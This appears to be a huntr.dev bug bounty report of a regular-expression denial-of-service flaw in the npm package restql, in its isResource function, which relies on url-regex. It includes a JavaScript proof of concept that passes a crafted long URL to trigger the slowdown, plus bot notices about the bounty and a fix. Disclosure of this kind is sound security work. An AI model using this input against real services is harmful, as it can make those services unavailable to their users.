Regular Expression Denial of Service (ReDoS)

[Hbkhan]

Description

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). An attacker providing a very long string to isResource function in utils/isResource.js can cause a Denial of Service.

PoC

var restql = require("restql");

/**
 * @constant {string} resource The resource to fetch.
 */
const resource = 'https://pokeapi.co.asdasdasd.asdsadasdsadsad.asdasdsad.asdsadasdsa.sadasdsadas.dasdasasdasd.432asdas3423.3423423423.234234243.234234234.23423423.24234.'

/**
 * @constant {Object} resolver The resolver to apply.
 */
const resolver = {
  'abilities[]?.ability.url': {
    'generation.url': {
      'main_region.url': null,
    },
  },
  'stats[].stat.url?': {
    'affecting_natures.increase[].url': null,
    'affecting_natures.decrease[].url': null,
  },
  'moves[].move?.url': null,
}

/**
 * @constant {Object} options The options to bypass.
 */
const options = {
  // ...
};

(async () => {
  try {
    const data = await restql(resource, resolver, options)

    console.log(data)
  } catch (error) {
    console.error(error.message)
  }
})()

💻 Technical Description *

The vulnerability exists in #L16. The code depends on url-regex package which itself vulnerable to this attack

[huntr-helper]

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

Automatically generated by @huntr-helper...

[huntr-helper]

‎‍🛠️ A fix has been provided for this issue. Please reference: 418sec#1

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.